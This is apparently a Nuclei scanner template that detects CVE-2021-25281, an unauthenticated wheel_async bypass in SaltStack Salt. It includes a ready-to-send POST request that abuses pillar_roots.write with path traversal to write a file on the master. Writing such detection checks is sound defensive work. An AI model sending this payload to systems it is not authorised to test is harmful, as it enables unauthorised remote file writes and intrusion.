id: CVE-2021-25281 info: name: SaltStack Salt <3002.5 - Auth Bypass author: madrobot severity: critical description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master. remediation: | Upgrade to SaltStack Salt version 3002.5 or later to mitigate this vulnerability. reference: - http://hackdig.com/02/hack-283902.htm - https://dozer.nz/posts/saltapi-vulns - https://nvd.nist.gov/vuln/detail/CVE-2021-25281 - https://github.com/saltstack/salt/releases - https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25281 cwe-id: CWE-287 epss-score: 0.70457 epss-percentile: 0.97698 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: saltstack product: "salt" tags: cve,cve2021,saltapi,rce,saltstack,unauth http: - raw: - | POST /run HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} matchers-condition: and matchers: - type: word part: body words: - "return" - "tag" - "jid" - "salt" - "wheel" condition: and - type: status status: - 200 # digest: 4b0a00483046022100ef2e42cdd5aa56bf8d6fd3f79763846ddbd5b7aa7e1ebcebd6c0ad3a1f3d1f3a022100d1bc83b245670c4d617557b14ef87e88a52b86f57b449918df5176ae26b430bd:922c64590222798bb761d5b6d8e72950